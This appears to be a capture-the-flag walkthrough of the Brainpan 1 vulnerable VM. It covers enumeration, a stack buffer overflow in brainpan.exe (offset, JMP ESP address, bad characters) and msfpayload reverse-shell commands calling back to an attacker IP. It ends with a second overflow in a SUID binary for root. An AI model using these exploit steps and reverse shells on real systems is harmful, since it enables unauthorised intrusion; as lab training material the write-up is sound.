root@osboxes:~# nmap -sn 192.168.1.0/24Now enumeration services...
Nmap scan report for 192.168.1.110
Host is up (0.00039s latency).
MAC Address: 00:0C:29:10:01:C0 (VMware)
root@osboxes:~# nmap -sV 192.168.1.110Let's browse the web application
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 20:23 GMT
Nmap scan report for 192.168.1.110
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.47%I=7%D=2/1%Time=56AFBED7%P=i686-pc-linux-gnu%r(NULL,
SF:298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x2
SF:0\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20
SF:\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\
SF:x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20_
SF:\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20_
SF:________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20T
SF:HE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:10:01:C0 (VMware)
Only trash information :-) Now turn to dirbuster (as always).
Oh! In bin directory may be some binary file?
http://192.168.1.110:10000/bin/
I think that we should run our Windows 32-bit VM and download brainpan.exe on it. Probably brainpan.exe is running on our target on 9999 port.
I am pretty sure that it will be good idea when we run brainpan.exe via Immunity Debugger.
Our Windows VM has 191.168.1.101 IP address. We have to click twice on Start button.
My own fuzzer
Result:
We know that for us the Stack has three addresses EAX, EIP and ESP. We have to find where is located EIP. We verified that 900 A's cause overflow. We have overwritten via 4x"A", so
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 900and we have to edit our script using output from above command. Executing our script we have got following result:
We can see, that EIP has been overwritten via 35724134
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 35724134Great! Now our payload will be as follow "A"*524 + "B"*4 + (900-524-4)*"C". Updated script gives following result:
[*] Exact match at offset 524
Excellent! We know where we should set up JMP ESP address and where our shellcode.
root@osboxes:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
OK! We also found module without ASLR protection.
!mona find -s "\xff\xe4" -m brainpan.exeNow, we find our JMP ESP address - 311712F3
So, our payload will be as follow: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We have to also check "bad characters", let's generate all possible hex values.
root@osboxes:~/brainpan1# cat hex.pyOur temporary payload : "A"*524 + "B"*4 + (900-524-4-int(len(tail)))*"\x90"+tail, where
dict = "abcdef0123456789"
for i in dict:
for j in dict:
print "\\x"+i+j
tail:
\xaa\xab\xac\xad\xae\xaf\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xba\xbb\xbc\xbd\xbe\xbf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xca\xcb\xcc\xcd\xce\xcf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xda\xdb\xdc\xdd\xde\xdf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xea\xeb\xec\xed\xee\xef\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xfa\xfb\xfc\xfd\xfe\xff\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\x0a\x0b\x0c\x0d\x0e\x0f\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x1a\x1b\x1c\x1d\x1e\x1f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x2a\x2b\x2c\x2d\x2e\x2f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x3a\x3b\x3c\x3d\x3e\x3f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x4a\x4b\x4c\x4d\x4e\x4f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x5a\x5b\x5c\x5d\x5e\x5f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x6a\x6b\x6c\x6d\x6e\x6f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x7a\x7b\x7c\x7d\x7e\x7f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x8a\x8b\x8c\x8d\x8e\x8f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x9b\x9c\x9d\x9e\x9f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99The first of all we should remove from our payload \x00(null byte - break everything what is next) and \x90 (No Operation - do nothing)
Afer sending this part of payload, we can see in our Immunity Debugger that, everything is fine. Now, we generate out shell code
root@osboxes:~/brainpan1# msfpayload windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"We have to replace tail to generated buf, run
root@osboxes:~/brainpan1# nc -nlvp 4444and execute our script
Nice! We should generate new payload for our Linux target machine.
root@osboxes:~/brainpan1# msfpayload linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"Execute our escript and BOOM!
We have got limited shell!
I verified and kernel of our target is not vulnerable to known exploit :-(, but look at some interesting
puck@brainpan:/$ find / -perm -4000 -type fOK, let's examine /usr/local/bin/validate.
[...]
/usr/sbin/pppd
/usr/local/bin/validate
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
find: `/lost+found': Permission denied
[...]
Have you though about Buffer Overflow again? Executing
sudo -lWe see that we don't have "extra" privileges. I have downloaded validate file via netcat to our machine.
We can see that we haven't got any result for JMP ESP, but we have got two records for CALL EAX. OK! Then we have expectaton that validate is vulnerable to Buffer Overflow.
Excellent! We know 200 of A's cause overflow our binary!
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 200
Amazing! We can determine "where" is EIP register.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 39644138Our payload will look as in screenshot below
[*] Exact match at offset 116
We have changed our privileges! TRY HARDER!
Game over!
